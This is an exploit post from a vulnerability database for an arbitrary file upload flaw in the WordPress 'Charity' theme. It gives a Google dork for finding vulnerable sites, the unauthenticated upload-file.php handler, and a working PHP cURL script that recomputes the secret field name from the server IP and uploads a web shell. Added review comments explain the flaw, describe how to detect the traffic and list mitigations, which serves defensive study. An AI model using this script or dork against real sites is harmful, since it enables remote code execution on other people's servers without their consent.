
WordPress Theme Charity Arbitrary File Upload Vulnerability

Author
terrorist
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-23258
Category
web applications
Date add
09-02-2015
Platform
php
#########################################################
# Exploit Title: Wordpress Theme Charity Arbitrary File Upload Vulnerability
# Source: https://github.com/UpThemes/Charity-Theme
# Author: terrorist
# Email: mrinjector17@gmail.com
# Team: GHC - Georgian Hacking Community
# Category: webapps/php
# Google dork: inurl:wp-content/themes/charity
#########################################################
 
# Vulnerable code: wp-content/themes/charity/admin/upload-file.php
<?php
// NOTE(review): annotated copy of the vulnerable handler; the code itself is unchanged.
// As shown, the script performs no login, capability or nonce check before
// accepting a file, so any client that can reach this URL can upload.
//Upload Security
// The only gate is the name of the multipart field: md5() of the server's own
// IP address. Anyone who knows the server address can derive that value, so it
// acts as an identifier, not as a secret.
$upload_security = md5($_SERVER['SERVER_ADDR']);
// The destination directory is taken straight from the request. base64_decode()
// is an encoding step, not validation: nothing confines the result to an
// uploads directory.
$uploaddir = base64_decode( $_REQUEST['upload_path'] ) . "/";
if( $_FILES[$upload_security] ):
	$file = $_FILES[$upload_security];
	// basename() drops directory components of the client-supplied name and the
	// replacements normalise ' ', '#' and '__' to '_'. The extension is never
	// checked, so an executable extension such as ".php" is kept as sent.
	$file = $uploaddir . strtolower(str_replace('__', '_', str_replace('#', '_', str_replace(' ', '_', basename($file['name'])))));
	
		// Stores the upload under the client-chosen directory and name.
		if (move_uploaded_file( $_FILES[$upload_security]['tmp_name'], $file)):
			// Mode 0777 leaves the stored file readable, writable and executable
			// for every local account.
			if(chmod($file,0777)):
			    echo "success"; 
			else:
				// The failure response echoes the PHP temp-file path back to the client
				// (filesystem information disclosure).
				echo "error".$_FILES[$upload_security]['tmp_name'];
			endif;
		else:
		    // Same temp-path disclosure as the chmod() failure branch.
		    echo "error".$_FILES[$upload_security]['tmp_name'];
		endif;
endif;
// Mitigation (review note): remove this file or block direct access to it. If an
// upload endpoint is required, handle it inside WordPress behind
// current_user_can() and a nonce check, store files with wp_handle_upload() so
// the destination and allowed types are fixed server-side, avoid world-writable
// modes, and disable PHP execution in upload directories.
?>

# Exploit
<?php
// NOTE(review): proof-of-concept request from the advisory, annotated to show
// what the resulting traffic looks like to a defender; the code is unchanged.
// Local file whose contents are sent as the upload.
$uploadfile="shell.php";
// Placeholder host used by the advisory.
$target = "http://target.com";
// Element 2 of the "/"-split URL is the host name; it is resolved to an IP so
// the field name the handler expects can be recomputed on the client. This is
// why md5($_SERVER['SERVER_ADDR']) in upload-file.php is not an effective secret.
$domain = explode("/", $target);
$server_addr = gethostbyname($domain[2]);
// Detection: the request is a POST to the theme's admin/upload-file.php.
$ch = curl_init($target."/wp-content/themes/charity/admin/upload-file.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_VERBOSE, false);
// Detection: the form data carries a file field whose name is 32 hex characters
// (the MD5 above) plus an upload_path parameter holding base64 text; here it
// encodes ".", which is "Lg==".
curl_setopt($ch, CURLOPT_POSTFIELDS,array(md5($server_addr)=>"@$uploadfile",'upload_path'=>base64_encode('.')));
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
// Prints the handler's response body, which is "success" when the file was stored.
print "$postResult";
?>

# Resulting file path (upload_path decodes to ".", i.e. the directory of upload-file.php): http://target/wp-content/themes/charity/admin/shell.php
